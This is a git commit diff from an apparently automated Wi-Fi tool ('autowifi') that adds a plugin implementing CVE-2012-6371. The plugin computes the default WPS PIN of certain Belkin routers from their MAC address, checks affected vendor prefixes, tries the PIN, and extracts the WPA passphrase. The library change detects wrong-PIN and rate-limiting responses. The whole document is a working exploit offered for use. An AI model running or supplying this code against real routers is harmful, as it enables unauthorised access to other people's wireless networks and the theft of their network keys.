diff options
| author | makefu <github@syntax-fehler.de> | 2013-05-26 14:06:53 +0200 |
|---|---|---|
| committer | makefu <github@syntax-fehler.de> | 2013-05-26 14:06:53 +0200 |
| commit | 5995257992d9b4d86313e3d78a85b68ffff0a2af (patch) | |
| tree | 8b21e64cb6a2f0b3fc9143adf2326c959d4fe6d1 | |
| parent | e7baf4ada0fa6b9aca40d9b237e84c23172ffdbd (diff) | |
add belkin WPS plugin
| -rw-r--r-- | usr/lib/autowifi/lib/wps | 16 | ||||
| -rwxr-xr-x | usr/lib/autowifi/plugins/11belkin_wps | 48 |
2 files changed, 59 insertions, 5 deletions
diff --git a/usr/lib/autowifi/lib/wps b/usr/lib/autowifi/lib/wps index 7fd38a26..8afd5b05 100644 --- a/usr/lib/autowifi/lib/wps +++ b/usr/lib/autowifi/lib/wps @@ -35,17 +35,23 @@ EOF #*"WPA: Key negotiation completed"*) # association failed # exit 1 ;; + if ( tail -f $WPA_LOG & echo "TAILPID: $!" )| while read line ; do + bye(){ + kill -HUP $TAILPID + exit $1 + } + echo $line case "$line" in - TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; + TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; + *"WPS-FAIL msg=10 config_error=18"*) bye 1 ;; # wrong pin + *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1;; # rate limiting *CTRL-EVENT-DISCONNECTED*):;; - *CTRL-EVENT-CONNECTED*) - kill -HUP $TAILPID - exit 0;; + *CTRL-EVENT-CONNECTED*) bye 0;; #yay connected esac done ; then - echo "Connected!" + #echo "Connected!" sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' $WPA_CONF return 0 else diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps new file mode 100755 index 00000000..93dd447a --- /dev/null +++ b/usr/lib/autowifi/plugins/11belkin_wps @@ -0,0 +1,48 @@ +#!/bin/sh +# thanks to http://ednolo.alumnos.upv.es/?p=1295G +# for the PoC code +# Calculates the default WPS pin of Belkin Routers and returns the WPA key +# +# Implementation of CVE-2012-6371 + +# works : +# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000 +# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000 +# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000 + +cd $(dirname $(readlink -f $0)) +. ../lib/core +. ../lib/wps +parse_args $@ + +MAC=$(printf "%s" $2| sed 's/://g') +if [ ${#MAC} -ne 12 ] ;then + echo "MAC malformed" + exit 1 +fi +VENDOR_MAC=${MAC:0:6} +PRIVATE_MAC=${MAC:6:12} +if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then + echo "VENDOR MAC $VENDOR_MAC not affected" + exit 1 +fi + +calc_belkin(){ + PRIVATE_MAC=${1} + + p=$((0x$PRIVATE_MAC % 10000000)) + wps_pin_checksum(){ + pin=$1 + accum=0 + while [ $pin -ne 0 ];do + accum=$((accum + (3 * (pin % 10)) )) + pin=$((pin/10)) + accum=$((accum + pin %10 )) + pin=$((pin/10)) + done + echo $(( (10 - accum % 10) % 10)) + } + printf "%07d%d" $p $(wps_pin_checksum $p) + return 0 +} +try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC}) |